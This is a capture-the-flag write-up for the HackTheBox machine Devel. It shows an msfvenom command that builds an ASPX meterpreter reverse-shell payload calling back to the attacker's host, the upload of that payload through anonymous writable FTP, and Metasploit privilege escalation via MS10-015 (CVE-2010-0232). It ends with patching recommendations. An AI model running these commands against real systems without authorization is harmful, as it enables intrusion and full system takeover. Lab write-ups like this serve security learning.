---
title: "Writeup - Devel (HTB)"
date: 2022-04-06
slug: "writeup-devel-htb"
type: "writeup-ctf"
--- 

This is a writeup for the [Devel](https://app.hackthebox.com/machines/Devel) machine from the HackTheBox site.

## Enumeration

First, let's start with a scan of our target with the following command:


```bash
nmap -sV -T4 -Pn 10.10.10.5
```
Two TCP ports are discovered:

![](img/image-1.webp)

- 21/tcp : FTP (ftpd)
- 80/tcp : HTTP web server (Apache 2.4.41)

![](img/image-2.webp)

## Exploit

I start by seeing if it is possible to connect to FTP as `anonymous`:

![](img/image-3.webp)

In addition to being able to read, we have the ability to write, so I create a payload to make a reverse shell with the following command:


```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f aspx -o shell.aspx
```
I upload it then with the help of Metasploit I launch a TCP handler to create a meterpreter.

![](img/image-4.webp)

I then access my previously uploaded payload at the following address:


```bash
http://10.10.10.5/shell.aspx
```
I now have a reverse shell on the machine.

## Privilege escalation

I pause the meterpreter with CRTL+Z. Then to try to determine some feats, I use the following module on Metasploit.


```bash
use post/multi/recon/local_exploit_suggester
set SESSION 19
exploit
```
The module has found a number of potential exploits.

![](img/image-5.webp)

I start by testing the first one:


```bash
use windows/local/bypassuac_eventtvwr
set SESSION 19
exploit
```
![](img/image-6.webp)

But without success. I test the second one:


```bash
use windows/local/ms10_015_kitrap0d
set SESSION 19
exploit
```
![](img/image-7.webp)

This one worked, I now have a reverse shell with the `NT AUTHORITY\SYSTEM` authorization. 

The module `MS10_015` is linked to CVE-2010-0232.


> [...] when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges [...] [VK9 Security](https://vk9-sec.com/kitrap0d-windows-kernel-could-allow-elevation-of-privilege-ms10-015-cve-2010-0232/)

I can now get both flags back.

![](img/image-8.webp)

## Recommendations

To patch this host I think it would be necessary to perform a number of actions:

- Disable writing to the FTP server as `anonymous`
- Update Windows to patch CVE-2010-0232